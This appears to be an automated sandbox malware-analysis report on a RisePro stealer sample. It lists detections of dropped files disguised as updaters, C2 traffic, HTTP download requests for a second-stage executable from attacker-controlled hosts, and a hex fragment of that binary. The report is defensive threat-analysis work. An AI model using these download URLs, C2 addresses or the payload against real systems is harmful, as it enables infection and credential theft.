Windows Analysis Report
file.exe

AV Detection

Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe	Avira: detection malicious, Label: HEUR/AGEN.1304053

Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	ReversingLabs: Detection: 83%

Source: file.exe

Joe Sandbox ML: detected

Compliance

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49706 version: TLS 1.2

Spreading

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D2B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError,		0_2_06D2B2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D62EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,		0_2_06D62EAD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D7CCFD FindFirstFileExW,		0_2_06D7CCFD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D2BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,		0_2_06D2BAC0

Networking

Source: Traffic	Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49704 -> 5.42.96.65:50500
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.96.65:50500 -> 192.168.2.5:49704
Source: Traffic	Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 5.42.96.65:50500 -> 192.168.2.5:49704
Source: Traffic	Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.5:49704 -> 5.42.96.65:50500
Source: Traffic	Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49704 -> 5.42.96.65:50500
Source: Traffic	Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:49707 -> 5.42.96.170:80

Source: global traffic

TCP traffic: 192.168.2.5:49704 -> 5.42.96.65:50500

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 17 May 2024 21:45:14 GMTServer: Apache/2.4.59 (Debian)Last-Modified: Thu, 16 May 2024 16:35:58 GMTETag: "45a2b8-61894d4759081"Accept-Ranges: bytesContent-Length: 4563640Content-Type: application/x-msdos-programData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21 97 5a 9f 17 26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d c2 aa

Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 5.42.96.65 5.42.96.65
Source: Joe Sandbox View	IP Address: 172.67.75.166 172.67.75.166

Source: Joe Sandbox View	ASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
Source: Joe Sandbox View	ASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /widget/demo/12.205.151.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=12.205.151.60 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.96.170Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.96.170Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.96.65

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D41980 SetThreadExecutionState,SetThreadExecutionState,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,recv,WSAGetLastError,__aulldiv,__aulldiv,send,recv,recv,recv,recv,Sleep,Sleep,

0_2_06D41980

Source: global traffic	HTTP traffic detected: GET /widget/demo/12.205.151.60 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=12.205.151.60 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.96.170Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: db-ip.com
Source: global traffic	DNS traffic detected: DNS query: kuljyftgjk.online
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.96.170/server/k/l2.exe
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.96.170/server/k/l2.exe5
Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.96.170/server/k/l2.exeDTl
Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.4444160556.0000000001719000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=12.205.151.60
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/z-
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com:443/demo/home.php?s=12.205.151.60
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: file.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/t
Source: file.exe, 00000000.00000002.4443887762.000000000169D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/12.205.151.60
Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/12.205.151.60
Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online/
Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online/Bb
Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online/ons
Source: file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online/server/k/l2.exe
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online/server/k/l2.exe5P#.
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online/server/k/l2.exedwzLnNKYB4T0Vnw.exe
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online/server/k/l2.exeo
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online/server/k/l2.exexefN
Source: file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online:80/
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online:80/I
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online:80/Mi&/
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exe
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exe5G
